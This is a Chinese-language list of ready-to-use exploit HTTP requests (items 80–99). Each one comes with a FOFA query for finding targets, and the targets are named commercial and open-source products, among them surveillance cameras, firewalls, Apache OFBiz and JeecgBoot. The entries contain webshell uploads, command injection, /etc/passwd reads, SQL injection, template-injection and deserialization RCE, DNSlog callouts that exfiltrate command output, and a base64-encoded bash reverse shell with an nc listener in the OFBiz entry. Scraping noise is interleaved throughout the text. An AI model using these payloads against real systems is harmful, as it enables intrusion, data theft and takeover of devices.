Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* h* f& k3 Q ?, f/ } QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
O9 w' a4 ?; F' h) k. ~2 P4 PAccept-Encoding: gzip, deflate
0 Z G, l: I0 u: O* M0 eConnection: close
9 k4 m: Q% ~3 C, P, KUpgrade-Insecure-Requests: 16 V+ z8 h* s% Z( z4 _
( \" g+ f, d1 g# y$ c5 ]9 t
, q0 @1 v |$ c2 B: ^- u80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传9 m i. m8 \* Q8 b1 ?
FOFA:app="速达软件-公司产品"; M* _! r5 r4 G- E( w3 ^
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
* }8 s0 U. a' R8 Q" J9 f6 H. g4 \% QHost: x.x.x.x3 L3 R. g& Q( c! j1 I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) N/ E5 e0 D" A6 `
Content-Length: 275 p* j, z8 S) L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; q; X/ V3 d2 ~" X# qAccept-Encoding: gzip, deflate
0 R- }0 s2 [% eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 u) f: X* X. I% v4 x: [6 gConnection: close5 O6 M: a5 \& }0 R3 Y$ y
Content-Type: application/octet-stream8 [1 X0 J8 j9 |7 O1 ^" m u
Upgrade-Insecure-Requests: 1
* N7 D& H! ?+ |+ [1 d9 ^ m% a: Y& e& q% {' R7 C
<% out.print("oessqeonylzaf");%>
) g0 h2 A/ ?/ I% l8 E [3 F' g f( [: d" @/ M- W" D. M
1 N, w! s' F9 N) X7 e
GET /xykqmfxpoas.jsp HTTP/1.1+ `* ~ }& I& y9 a- ]
Host: x.x.x.x
" e8 y- _2 r" p( G) i+ iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& _! _. O! v+ r- n N
Connection: close
- S1 L" P9 P+ F, M- ]: oAccept-Encoding: gzip- @' h( X# V: a7 [5 Z) V
% \9 E; o2 q. G, o7 I% n6 S
! t3 J: J7 P' B: S3 W7 q81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露( ^' C1 m$ W: X; H5 s
FOFA:app="uniview-视频监控"
7 F( y$ E) _9 x: ]7 {GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
( n, H5 V- I5 S4 f) v( @. vHost: x.x.x.x9 x6 ]2 L6 t4 A$ F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 h, n: G# s. j1 UConnection: close
' k$ b+ n5 m* v p5 \$ n( H/ P/ MAccept-Encoding: gzip
1 ~ N W( t' q P: z1 x5 y. r m% ?( ?% T3 ]+ _' i+ m$ e' b3 _
1 ?* C7 C3 I2 N0 {% x82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行/ d! d4 I$ p; N2 S
FOFA:app="思福迪-LOGBASE", G* G' U6 H$ w" q7 |# j. D+ Z! g
POST /bhost/test_qrcode_b HTTP/1.1/ w# ~" k5 W" F. e' }
Host: BaseURL, @* I- t5 z% u+ M7 _
User-Agent: Go-http-client/1.1
& o2 [$ `" a# e% q {Content-Length: 23. i& }7 t; K& M6 `
Accept-Encoding: gzip
$ P8 s4 X8 W2 x* W2 u: u4 G/ j xConnection: close8 x2 W$ b4 \- g. | ?! e6 Q! K
Content-Type: application/x-www-form-urlencoded
$ s% F2 L9 B% A& uReferer: BaseURL
/ z( v' j& g2 m. Z
6 S% z8 j- C: Y2 F8 Cz1=1&z2="|id;"&z3=bhost8 T0 Y' n( e- L( E, J# i
2 v# F) K+ N: y9 k: `( P1 ?! e" X$ D5 ^2 R! q+ {! ]. v7 U
83. JeecgBoot testConnection 远程命令执行, ^! j$ z6 I1 t* ]6 |2 @: H
FOFA:title=="JeecgBoot 企业级低代码平台"* M) L; l8 o8 N; ?
0 J ~" x0 k: T, |0 {1 B
5 m$ F2 p2 l$ v1 LPOST /jmreport/testConnection HTTP/1.1' B! l% o, H- C
Host: x.x.x.x
. J; t4 O& `, ?7 J, V$ H; pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 d* B; u; S _- t' J6 J, w2 I2 [
Connection: close
6 ?; H& M( V2 L, p! y/ RContent-Length: 8881; ]( F9 z$ t5 g; ~
Accept-Encoding: gzip) @+ z) W' P9 {/ ]5 w T3 W& @
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"8 q+ n! }% c5 Q- a# _' u$ V
Content-Type: application/json
" @3 J: r4 [3 j, n& V3 A+ e7 m& A
% p% ^$ |( T+ H! m; ]+ E7 Q: XPAYLOAD. J& Q. Z/ v2 h$ c
' n* s" L" w! q% M+ C# m84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
; m: n' N- H8 N1 cFOFA:title=="JeecgBoot 企业级低代码平台"
/ G' d. ^9 Z0 t
* [3 c: ^( ]8 ^# e. z4 p; u4 ?
5 J: ?; Q1 V" C3 D% L8 S3 b
5 L7 z7 I D. t# Q* y# V5 nPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1) E U" r8 q& x( ^
Host: 192.168.40.130:80800 N9 S- c, E6 O* T
User-Agent: curl/7.88.1$ v# z4 C3 a: T. m
Content-Length: 156: z) M0 B' J, N& G6 E
Accept: */*
5 F- L/ G2 x# T# cConnection: close
# o! j: r0 B0 _Content-Type: application/json+ f% \5 m+ _" o& }: }7 `
Accept-Encoding: gzip
3 O7 p, Y4 O* \% v5 E5 b0 A2 [& k0 q4 K$ C. h
{2 t+ |5 u2 e3 O/ P* @
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
; v! A& {& W" j8 h "type": "0"
5 B% x* w# Z/ @) \: x}% v N1 n* z# O+ c
1 f; q- }* j7 G( S# H
! z1 ~. W" _# C# b! F6 N8 t! ?4 L/ r85. SysAid On-premise< 23.3.36远程代码执行
7 c1 a. x+ e1 r- ACVE-2023-47246
9 [0 L6 z) i, s7 f0 ^* r. q7 ZFOFA:body="sysaid-logo-dark-green.png" ' G( c# u1 |( v0 ]8 T
EXP数据包如下,注入哥斯拉马: [7 H4 C% x3 z$ a
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.18 c5 L; G/ e8 j- B# O
Host: x.x.x.x5 Y% R* I5 N9 \/ _) ~& T" e1 r) R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 `+ p# ]- L0 y( {% i4 ^Content-Type: application/octet-stream
$ G/ t4 F+ g! ^4 j3 z7 D; ~- OAccept-Encoding: gzip0 G9 |! T8 K* z+ S8 D
+ [' l8 Q* p0 [( @" o% z4 E
PAYLOAD5 R1 c5 X) M/ h4 l: N- a4 h* ^
- H" ]9 B6 ^+ ^. P( W9 ]3 Y2 a- L回显URL:http://x.x.x.x/userfiles/index.jsp
. M4 E4 e( f& O, g3 H6 X6 {( m* H& G. O) z# T# n5 o2 t7 [# {' C/ h
86. 日本tosei自助洗衣机RCE
' v F& k- t' u, Y, W, T! AFOFA:body="tosei_login_check.php"4 w; f; a |2 `$ M7 a# M
POST /cgi-bin/network_test.php HTTP/1.1
% j: G) F4 Z5 [& E( B: YHost: x.x.x.x' \) f& z- Q* p9 F
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36, @4 \- c2 p/ `1 q4 w
Connection: close$ t; C/ {# i, y- t- J; |
Content-Length: 44) |! @" a, L0 f2 q2 t
Accept: */*
, r! L6 K9 z) X2 Z+ xAccept-Encoding: gzip5 }, H1 | u+ z- F, Q- j& {8 z9 {5 X
Accept-Language: en
7 r. |: ]! _" {Content-Type: application/x-www-form-urlencoded. S3 m5 I% B6 X/ y$ J
# b. ~: h& F9 g* \; Chost=%0acat${IFS}/etc/passwd%0a&command=ping
4 y |2 l4 \+ L0 t* q% E r+ ]/ Q5 [- ~9 T r; ^& L. D- w3 n
" e9 q9 a: S4 b2 I+ p% F5 z
87. 安恒明御安全网关aaa_local_web_preview文件上传
+ Z7 o' A$ W% Z+ y: |. eFOFA:title="明御安全网关"& j+ P+ Y% Q. D- z( ?( p
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1/ c" X% x @5 }8 C) g/ s+ K! k
Host: X.X.X.X4 y+ T( w$ ~) H0 t. G! j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; H R+ o# Q3 r- R9 K' n* D1 _; v
Connection: close8 K% @ r0 q+ y
Content-Length: 198+ b2 `* y* R- m8 j
Accept-Encoding: gzip
: X5 g' L. |) qContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd' H8 Q+ y* O9 I# S7 S) H
( d9 F7 j: _* {. C( e* \--qqobiandqgawlxodfiisporjwravxtvd0 B' @ C2 R: z! J0 o
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
& Q8 f& P7 e0 G5 EContent-Type: text/plain# K5 ?$ u, C" `
* x4 ?8 e/ j( u2ZqGNnsjzzU2GBBPyd8AIA7QlDq
. E) s5 t" [1 ]- {0 C5 ?. @--qqobiandqgawlxodfiisporjwravxtvd--
' r1 [% m2 `3 `0 P+ o6 ^
6 T, \; l( e; L7 {% K8 b
4 O y1 e8 C* D/jfhatuwe.php! t: `: d3 q' B
3 t! G0 {+ X5 B88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行+ _3 U# G/ U# u, ?- v
FOFA:title="明御安全网关" P/ u. f% T9 q
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1$ K ^9 D Q. z8 [ I1 w
Host: x.x.x.xx.x.x.x- k- X0 j. Q- I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ f8 M5 F$ o% r+ o5 ?" n6 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 o$ J8 [$ w2 N P1 o2 A# x7 [Accept-Encoding: gzip, deflate/ Z5 C8 ?- P1 X( I. y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* d k+ L* T7 y/ U1 ~# S8 YConnection: close3 Q) G- J- h9 m; f
8 Z$ o! i, T1 t4 V1 D) H7 f
5 i* H: G4 c( i$ j/astdfkhl.php
) g S H% Y( G% f3 C5 M' y% M2 z- @. e
89. 致远互联FE协作办公平台editflow_manager存在sql注入6 l9 n, C6 `. g; V& I; E
FOFA:title="FE协作办公平台" || body="li_plugins_download"
1 [3 p$ c) o. H5 h$ s BPOST /sysform/003/editflow_manager.js%70 HTTP/1.16 c5 V ?# M4 H% b
Host: x.x.x.x
( t* i# H" D7 b: l* jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 C+ {" _1 R& e8 |. f JConnection: close
7 B% l+ C+ n( F$ QContent-Length: 41+ s3 b8 G* O+ c% P! x( C% M2 E
Content-Type: application/x-www-form-urlencoded
) o8 r0 @. ^4 f1 E% y9 J9 ~' r" jAccept-Encoding: gzip0 I0 F( A/ z" n5 J# o$ N
, p' _8 r6 r0 i" koption=2&GUID=-1'+union+select+111*222--+
. ~9 l- m1 m' m/ ^5 j6 q; p/ i- [ M
$ k/ R5 m, B2 q$ h5 w2 z f; v7 C. i \7 r& d+ @ y
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
, _- j$ g' F6 i, L6 L. L( l+ I0 X" tFOFA:icon_hash="-1830859634"8 k! Z2 j& R. M) Q$ R# ^- `/ Z Z2 @
POST /php/ping.php HTTP/1.15 X7 ~, ~( x6 M9 _8 o$ H
Host: x.x.x.x
( @ K7 h- O4 e l( ~/ i: gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0; b) m- J1 S$ N' d% f) x) S8 a
Content-Length: 51/ K% }+ w) T* Z/ A$ j2 C& o M) B
Accept: application/json, text/javascript, */*; q=0.01
- ]( G5 T" ~' a( B& ?Accept-Encoding: gzip, deflate+ [6 z! i# m8 r4 k# V! u" W. j+ W' @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' G5 n+ g4 r. s7 f. d, iConnection: close
* P# l, ]9 h$ p% w4 iContent-Type: application/x-www-form-urlencoded
7 M3 ~" o3 o# A8 ]8 X9 NX-Requested-With: XMLHttpRequest/ w5 O$ X: {1 k0 ?: \5 r
8 j$ [2 z( R1 v( C+ jjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig; ?9 ~5 @1 b8 M" w( V& N2 }# G
* Z. c# _% ^% P9 S4 y
3 {/ Q& y' A, q91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
+ R6 ]% j, G% ]; l( w2 P$ M% V( ^& P e# GFOFA:title="综合安防管理平台"! ?. y& ~; g- E- `$ Z
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
+ v& k+ {4 d/ V5 Q9 aHost: your-ip! `* M/ O% G, l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.365 Q, ~# p. A1 ?/ |3 a8 T
Accept-Encoding: gzip, deflate5 s; Z/ A; G# [* Q8 J$ }$ B1 N
Accept: */*
! `6 ]% W: L% }2 j/ `Connection: keep-alive! d4 p2 K3 M; ~8 O% ^
, r [4 h1 Z, K {+ |9 q
. ^3 x, k" r. {, t" y! _
9 h" ], I: ?$ t g& h9 r/ U8 q92. 海康威视运行管理中心session命令执行. W, L' ^- Q7 {: N2 }+ T
Fastjson命令执行
5 Z' |) N% f) b* m' ihunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
. U/ o; V, @! N# Y8 C+ k! ]9 V9 hPOST /center/api/session HTTP/1.1
% B3 ?) N/ u& Y9 }+ gHost:
) F( {' C* V: F& i: zAccept: application/json, text/plain, */*
' b1 u3 w1 ^7 N& mAccept-Encoding: gzip, deflate
5 Y; m. U, U+ O; CX-Requested-With: XMLHttpRequest
. T5 ]7 v2 W$ a8 b3 p4 GContent-Type: application/json;charset=UTF-89 a- W0 j$ }& M3 I' ?4 a
X-Language-Type: zh_CN, t$ M* ?; z0 ]! Q8 P5 t
Testcmd: echo test
& |* y. b: I7 b% O7 f4 c) CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36: ^9 H8 u0 ?1 C& ^4 e; g6 e! ?
Accept-Language: zh-CN,zh;q=0.9
; h" y3 o0 w! T; a% _) ~& mContent-Length: 5778
5 q8 J& M4 x6 l& p3 r0 n9 e9 m4 x$ v' o# f+ d- g
PAYLOAD
4 J- u$ X o3 ~, [* k) }5 ^+ ~& x) e
# y( Y! d* S( W
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传) B6 o% Q" k- G0 v$ Z! Y9 Z) I
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="( [8 Y4 x7 p& t8 w
POST /?g=app_av_import_save HTTP/1.1) E% o8 I+ S" ?- m
Host: x.x.x.x; N+ {5 L& i8 A8 U2 f
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
1 p! E- F+ z7 V- s" @9 ]9 k. s! lUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
' B" {) r7 w2 H$ O9 h- J% Y4 b* l/ S* T* v& L. M) E B: i# U
------WebKitFormBoundarykcbkgdfx
6 r" e- p) I# S3 p4 @' ~' ?Content-Disposition: form-data; name="MAX_FILE_SIZE"
1 v# K' f2 q; D* P0 \5 h/ _* j% U6 P, i$ H! J5 f
10000000
" v. m7 C8 [0 g8 C. l------WebKitFormBoundarykcbkgdfx
+ _' v# B- w' x- I- k, @Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"$ O8 U0 y# c' f) M! }- g( ^; H" B
Content-Type: text/plain
$ H. e0 w3 m5 m6 {. g$ v
! }8 ?' A8 ?, _7 Kwagletqrkwrddkthtulxsqrphulnknxa
; F8 a7 T! s1 G/ V# g, d------WebKitFormBoundarykcbkgdfx
[5 V" P0 k8 `" G7 d* P! J# `Content-Disposition: form-data; name="submit_post"
5 ^0 O5 ~* D n: E6 V1 V+ k7 [+ O+ C$ |6 m. k# }
obj_app_upfile9 Q" x! x( \" @1 P) V% P b. n$ Z- }5 V
------WebKitFormBoundarykcbkgdfx
9 }' [; w( k2 I; QContent-Disposition: form-data; name="__hash__"
. E* S M7 h6 O$ f4 K6 O0 F1 O+ u' C6 }# _9 E
0b9d6b1ab7479ab69d9f71b05e0e9445: j: V1 }3 q: x8 s# |1 {
------WebKitFormBoundarykcbkgdfx--
9 q$ Z8 Y, u& v C9 M2 l! E! r; q. S7 k0 P# P; ^
1 a8 r% C: U8 u. Q1 G, d
GET /attachements/xlskxknxa.txt HTTP/1.1+ b% D5 r7 q2 ^% T( `# F
Host: xx.xx.xx.xx
! f% f' L* A/ a8 K- j( m0 AUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
0 J. c5 D% n; k& e# B; C
5 ~/ s7 G7 T' h H+ M l
$ ?5 \0 s7 r* @9 x& }2 V8 M94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传9 }& I% w& V( }7 k4 K6 b
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
6 `4 Q/ {7 z3 ]6 ?3 x% APOST /?g=obj_area_import_save HTTP/1.1$ I+ S& T0 k7 _2 e0 p* p
Host: x.x.x.x* J4 w5 }9 o1 x! X- k3 ~8 L) X5 o
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt4 c7 r) }$ \% r% m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
9 E' o3 t+ x3 m, y
8 r7 B: |7 f9 ?- H# _! W8 n( ?' ?------WebKitFormBoundarybqvzqvmt, t. H0 K7 Y0 e
Content-Disposition: form-data; name="MAX_FILE_SIZE"
9 a* P8 O" E1 i* ]9 P
8 w: S+ n4 Q+ R100000007 V7 p- u' H0 ]5 q+ X
------WebKitFormBoundarybqvzqvmt! g* ^. j" R6 K# |& J( [4 {7 ]+ Z
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"1 K: Q0 K! K! F' g1 J
Content-Type: text/plain
: }: r+ \( X4 z! a) f- f
8 m3 { a+ {* {% U. Apxplitttsrjnyoafavcajwkvhxindhmu
! {) c+ d$ q6 z: \8 ]6 r: x! L& W------WebKitFormBoundarybqvzqvmt; n; j( R( z0 q7 Y
Content-Disposition: form-data; name="submit_post"$ {! l& S$ @/ s0 |4 J( R. b
9 V( a# h: C! h% B- S { n! w/ e
obj_app_upfile0 P5 L' r1 c3 o! W3 K) X6 o' q1 F
------WebKitFormBoundarybqvzqvmt
+ E+ Y' a- n2 L7 `4 aContent-Disposition: form-data; name="__hash__"
# L W7 M4 ~1 t+ b( `6 n1 w& _ m! s p
0b9d6b1ab7479ab69d9f71b05e0e9445
) q6 x8 s4 Y- t$ Q! ]------WebKitFormBoundarybqvzqvmt--
9 Y* a% |+ V5 n/ K- o. N0 y3 a
5 L# m- v8 i' ^
! |5 w- F2 S! Z/ b: c/ d2 Y# H5 yGET /attachements/xlskxknxa.txt HTTP/1.1
! A, `" L. F+ J. |: g, f- ^Host: xx.xx.xx.xx
+ w# E+ @3 V$ H4 LUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
( x' U* d5 n; O# e2 ?* X; j2 _! Y
8 \1 q( Y) e5 W" L/ C( I
2 e. d7 C% |2 `$ a& s P) ~ |5 l* Z) f: @ y
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行$ f8 e; a8 \/ Y$ F& S: l
CVE-2023-490705 j4 U1 F, h! _+ n' c" G% v k
FOFA:app="Apache_OFBiz"& z. O- e# V+ j
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.12 K+ E: O6 d3 O! e& a
Host: x.x.x.x' G/ T2 C1 R2 y5 j
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
& J, r) P3 [" LConnection: close& D1 n& T, X/ P4 H [! x
Content-Length: 889
1 Y' H& g3 M3 Z. k: EContent-Type: application/xml) ?( y' F, B) m' G' G/ Z# b& h4 y
Accept-Encoding: gzip/ P7 N8 R- q6 H- ~
8 r, r. \& @+ q' [; i0 ~; Y, o* v2 t i
<?xml version="1.0"?>
' J' O7 ^; o7 [5 k# C! G<methodCall>- V2 K; Z! w2 v
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>! ^6 r9 q. \, b& j: L( ~( a
<params>- ~4 k' @( d/ I
<param>) N$ w, m9 A7 \. E' F) B4 ~
<value># g- F. x8 r9 J# f, }# |
<struct>6 }" V& s+ W }! \+ v# E3 I, F
<member>
! _0 ~( m& ^( X& o* s <name>test</name>8 H' z5 L: B7 R3 |4 l
<value>( P1 o- R2 N) Q' ^) z
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
5 b' M* o; s) W" H C2 I0 m </value>7 Y" O( y9 Q5 M+ Z' n
</member>% g8 W' e" @2 d- c4 P1 Y; y9 O
</struct>6 f5 A( Y9 M% C- L! i# \. f3 k" o
</value>
" C8 m8 ?2 m$ j; J </param>
9 h4 C: m0 R6 s: Z9 X9 ` </params>
3 H: f7 C% |5 I3 L) g7 n6 }+ l</methodCall>" `9 ~6 d4 N6 k
5 ?4 ~' H7 |& S! R( a! W: J
& M9 v) S" c2 t- z, p
用ysoserial生成payload: j6 p3 N. D/ g. S
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"! d$ {' u. ^7 E8 E- [+ _
0 _/ @9 c/ w. F/ v$ S1 k5 v
* q; s/ \8 ^ w% L/ x* a
将生成的payload替换到上面的POC# ]1 A! H* o: @
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
" k/ ?7 O, t7 d4 a: cHost: 192.168.40.130:8443
& C" N+ F) S( u% ]& [0 A" pUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 T& n! O9 [5 Y6 I/ a9 Q" G5 N! d
Connection: close/ [& d) b- m& x4 _' o l. F
Content-Length: 889+ I' O: N# q# M6 u# R/ q* g% I0 u
Content-Type: application/xml! |# D' E- s, J$ s, x6 S
Accept-Encoding: gzip' O# n7 @1 S" |& p4 {5 _" i* n
# a9 b7 H# r% Y, U( C# a
PAYLOAD* P% v# h$ ^$ v1 |7 Y
0 I/ j0 }6 G9 V, q. s
96. Apache OFBiz 18.12.11 groovy 远程代码执行8 e) j: A4 X! z: T! d7 K
FOFA:app="Apache_OFBiz"
8 _- S' U7 a) l9 E( R7 IPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
( |$ `( X/ v m, |Host: localhost:8443% P- I/ U! \ y9 H+ U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.00 A$ M3 S: `6 N. Z, f$ Q' ?; ]
Accept: */*
; q- m2 A- ?; s2 A! `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. R" _& \4 p7 }) c
Content-Type: application/x-www-form-urlencoded3 o1 e7 Y1 N: @- N
Content-Length: 55, [5 k* j$ F7 p X. E) {' a) D/ B1 N
4 I0 C6 Z* ^+ l5 r) n' h/ g
groovyProgram=throw+new+Exception('id'.execute().text);% J3 d# J* o# ~; E+ i% H4 A" I
: a6 j9 p1 T! c1 x* K% \* f; L9 M6 j- @- s+ K
反弹shell3 H: V% ^: j/ j6 d# Y( @; U# z
在kali上启动一个监听( }( `5 J3 v* d3 j
nc -lvp 7777! b+ l3 P- w# C4 `1 s3 D0 D8 e. S2 X& {
: p( G. W* q) Z3 _
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.14 B3 Z; Q( r% X% _! [
Host: 192.168.40.130:84437 w3 `/ s! Z$ `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0* ^% b+ a" ~7 Z5 ^
Accept: */*; J9 H N) A6 [ I5 n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" S+ C; v D1 R8 S, M7 d% Z2 [
Content-Type: application/x-www-form-urlencoded# N: H5 g' r( O3 G8 F# a7 q, n) c% h
Content-Length: 71
' G. L, r# k/ X" Y7 V9 y9 ^( e7 C) n$ o* k2 H. ^+ N
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();% E& e8 d. a Q& k1 F! l% z" V
B6 t2 `& h. r5 L# M) ~97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行. [. [' N F7 [- p- z4 r! d
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客": v$ N% `5 m, I$ Z' f
GET /passport/login/ HTTP/1.1
) w3 F2 M N8 @0 |! OHost: 192.168.40.130:8085& D" L& |' D" w) C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 }; q4 u" Y' [! x" N- zAccept-Encoding: gzip
) o5 l) u3 y* a. r `Connection: close" P1 ] H* i) y: i% a% `
Cookie: rememberMe=PAYLOAD8 o. z9 ~! O/ g% n/ L- S+ l
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"1 k4 ?& R* u+ ?% h9 z% Y, E0 j I
/ R' E- V2 y* I( p6 b
: m" S% K6 D+ A0 z98. SpiderFlow爬虫平台远程命令执行
0 C- v p$ }* T- n3 NCVE-2024-0195
+ w4 W# c" L. {FOFA:app="SpiderFlow"
' q% m) ]$ M; x4 yPOST /function/save HTTP/1.15 K0 F A5 ~% \
Host: 192.168.40.130:8088, x+ ^; O' t$ H d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
# i( ~# f& V ^7 y1 {, P* gConnection: close
- B0 d- B2 X! B0 W& qContent-Length: 121
. T2 d1 ~& b) A; RAccept: */*+ H" W# `( O7 H# R) r
Accept-Encoding: gzip, deflate
/ D- c" g7 y5 ], M; @9 gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 E1 Z$ ]+ V, L' e
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
0 r/ X0 k0 e8 r; o9 c! x8 `% s8 W) LX-Requested-With: XMLHttpRequest
/ l7 N" Y F% E" R' Q3 f
- V: M9 _' n" g; did=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
$ U2 j( O' S. q4 A: [, h) e3 I5 e9 O% ?' j# {
+ Y, @# A: K1 M9 t. i. v; ]8 _. r99. Ncast盈可视高清智能录播系统busiFacade RCE' Z) @& x1 X! ^8 A- V# q' K
CVE-2024-0305
$ }. u/ C6 ] `+ K7 XFOFA:app="Ncast-产品" && title=="高清智能录播系统"
! x; h' a. N2 {& jPOST /classes/common/busiFacade.php HTTP/1.1
